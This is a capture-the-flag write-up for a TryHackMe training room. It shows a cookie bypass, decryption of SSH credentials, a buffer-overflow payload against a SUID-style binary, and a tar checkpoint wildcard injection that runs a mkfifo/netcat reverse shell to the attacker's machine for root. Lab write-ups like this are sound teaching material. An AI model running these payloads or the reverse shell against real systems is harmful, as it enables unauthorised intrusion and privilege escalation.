Tryhackme Anonymous Playground CTF-Writeup
Flag 1
At first we are scanning for open ports and we found the two open ports 22 and 80. Additionally a disallowed entry in robots.txt for the folder /zYdHuAKjP
The website does not contain any usefull information, therefore we are looking into the robots.txt.
The folder /zYdHuAKjP is denied for search engines. That looks interesting.
We have no access to /zYdHuAKjP, therefore we take a look into the response headers
In the Response Headers we can see that a cooky named access and the value denied is defined.
By using
curl — cookie “access=granted” http://[ip-address]/zYdHuAKjP/
we gain access to the proteced site resulting the HTML Code containing an encrypted text. (Maybe a username/password?) .
Tryhackme shows ‘zA’=’a’ as hint for Flag 1, leading to the algorithm for decryption.When substituting every first character with an integer i and every second character with the integer y we get the following formula for resulting decrypted integer d:
When substituting every first character with an integer i and every second character with the integer y we get the following formula for resulting decrypted integer d:
(i+y) mod 26 = d
As an example for nY
(14+25) mod 26 =13 => m
I created a Java tool to decrypt the username and password, of course it is also possible to implement it in Python , too.
To use it, you have to clone the repository H3L3Kdh0riA/THM_Anonymous_Playground_CTF_DecryptTool (github.com) and follow the instructions in the Readme.md.
After decrypting username and password we can try to gain acccess via ssh.
After succesfull login we find the flag.txt open it and hence we have the flag 1.
Flag 2
We take a look at the home folder of magna and we find the plain text file note_from_spooky.txt and the binary file hacktheworld. The note from spooky gives us some clues, therefore we fetch the file hacktheworld and analyze it with Ghidra.
Furthermore we look at the main function and the symbol tree and we find the function call_bash.
In the function call_bash we discover that the user id 0x539 is set. This apears to be the user id of spooky. We also know the entry address of call_bash from Ghidra.
After some tires we find out that that we can cause a segmenation fault by piping exactly 72 characters into the binary file hacktheworld.
Now we can inject the call address of call_bash using the correctly endian and therefore we have escalated our privilliges to spooky and can cd to /home/spooky and catch the second flag.
(printf — ‘-%.0s’ {1..72} >exploit.txt) ; (printf “%b”’\x58\x06\x40\x00\x00\x00\x00\x00' >>exploit.txt) ; ((cat exploit.txt ;cat) | ./hacktheworld)
Flag 3
Now we enumerate the environment and find a possibility for tar exploit in the crontab with these shell commands:
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [MyVMIPAdddress] 5555 >/tmp/f” > shell.sh
echo “” > “ — checkpoint-action=exec=sh shell.sh”
echo “” > — checkpoint=1
Now we start a listener for remote shell via netcat.
nc -lvnp 5555
After a few minutes the remote server connects to our machine and we gained root access and can catch the last flag.
